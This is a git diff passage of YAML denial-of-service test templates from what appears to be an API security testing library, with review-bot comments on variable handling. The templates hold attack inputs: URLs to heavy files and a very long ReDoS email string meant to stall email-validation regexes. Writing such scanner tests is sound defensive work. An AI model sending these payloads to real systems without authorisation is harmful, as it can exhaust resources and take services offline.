@@ -121,9 +121,11 @@ execute: - failure: exit - req: - modify_query_param: - png_key: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/meme.png + ${png_key}: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/meme.png + for_each_combination: true - modify_body_param: - png_key: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/meme.png + ${png_key}: https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/meme.png + for_each_combination: true - validate: response_code: gt: 505 
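Review bot: DoSTestPDFFileURL.yml uses the `https://github.com/.../raw/akto_resources/...` form for the heavy file, while the JPG, MP4 and PNG templates use `raw.githubusercontent.com`. The `github.com/.../raw/` form is normally answered with a redirect to the raw host, so a target that does not follow redirects would never download the PDF and the test would report no issue without exercising the large-file path. Using the direct form in both `modify_query_param` and `modify_body_param`, `https://raw.githubusercontent.com/akto-api-security/tests-library/akto_resources/resources/heavy%20files/heavy-pdf.pdf`, would make the four templates behave alike.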
diff --git a/Lack-of-Resources-and-Rate-Limiting/DoSTestQueryParamKey.yml b/Lack-of-Resources-and-Rate-Limiting/DoSTestQueryParamKey.yml index 7fce589e4..336db530e 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DoSTestQueryParamKey.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DoSTestQueryParamKey.yml @@ -69,14 +69,14 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userValue - query_param: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userValue wordLists: @@ -133,6 +133,7 @@ execute: - delete_query_param: ${userKey} - add_query_param: ${queryParamValues}: userValue + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/DosTestLargeNumbers.yml b/Lack-of-Resources-and-Rate-Limiting/DosTestLargeNumbers.yml index b24830bbc..0239c26a8 100644 --- a/Lack-of-Resources-and-Rate-Limiting/DosTestLargeNumbers.yml +++ b/Lack-of-Resources-and-Rate-Limiting/DosTestLargeNumbers.yml @@ -72,7 +72,7 @@ api_selection_filters: for_one: key: regex: .* - extract: userKey + extractMultiple: userKey value: datatype: number extract: userVal @@ -102,7 +102,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: ${attemptValues} + ${userKey}: ${attemptValues} + for_each_combination: true - validate: response_code: gte: 200 diff --git a/Lack-of-Resources-and-Rate-Limiting/EmailRegexDOSSmallInput.yml b/Lack-of-Resources-and-Rate-Limiting/EmailRegexDOSSmallInput.yml index d49c66858..eefc15c89 100644 --- a/Lack-of-Resources-and-Rate-Limiting/EmailRegexDOSSmallInput.yml +++ b/Lack-of-Resources-and-Rate-Limiting/EmailRegexDOSSmallInput.yml 
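Review bot: In the `add_query_param` step of DoSTestQueryParamKey.yml the value is still the bare word `userValue`, while this commit switches the other references to the `${...}` form. If bare names are no longer resolved as variables, the request would carry the literal string `userValue`; `${queryParamValues}: ${userValue}` would be consistent with the rest of the change. Separately, `userKey` is now captured with `extractMultiple` but `userValue` here, `userValue` in DoSTestJSONBodyKey.yml and `userVal` in DosTestLargeNumbers.yml are still captured with `extract`, so the value no longer necessarily belongs to the key being deleted; a comment saying which value is used would help. The `execute` block starts outside the hunk, so where `for_each_combination` attaches cannot be confirmed from here.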
@@ -69,7 +69,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey execute: type: multiple @@ -114,7 +114,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: "a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a@a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a@a@a.com" + ${userKey}: "a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a@a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a@a@a.com" + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/EmailRegexReDOS.yml b/Lack-of-Resources-and-Rate-Limiting/EmailRegexReDOS.yml index 762a52050..9f8895db8 100644 --- a/Lack-of-Resources-and-Rate-Limiting/EmailRegexReDOS.yml +++ b/Lack-of-Resources-and-Rate-Limiting/EmailRegexReDOS.yml 
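Review bot: The key regex in EmailRegexDOSSmallInput.yml mixes anchored alternatives with the unanchored `username` and `email`, and lists `^client_id$` twice. With `extract` this mostly affected which API was selected; with `extractMultiple` every key containing `email` or `username` as a substring (for example a flag such as `email_verified`) presumably now receives the payload string too, which adds requests that do not reach an e-mail validator. If substring matching is intended, a comment above the regex saying so would be enough; otherwise use `^username$` and `^email$` and drop the duplicate `^client_id$`. The same regex is in the first hunk of EmailRegexReDOS.yml.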
@@ -76,7 +76,7 @@ api_selection_filters: for_one: key: regex: "username|^user$|^userid$|^user_id$|^login$|^login_id$|email|^account$|^account_id$|^member$|^member_id$|^id$|^user_name$|^uname$|^identifier$|^user_identifier$|^admin$|^nick$|^nickname$|^handle$|^alias$|^principal$|^profile$|^profile_id$|^name$|^signin$|^auth$|^credential$|^user_login$|^user_account$|^user_email$|^employee$|^employee_id$|^operator$|^customer_id$|^client_id$|^subscriber$|^subscriber_id$|^participant$|^participant_id$|^client_id$|^userLoginID$|^client-name$" - extract: userKey + extractMultiple: userKey - request_payload: for_one: key: 
@@ -125,7 +125,8 @@ execute: - failure: exit - req: - modify_body_param: - userKey: "a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a@a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.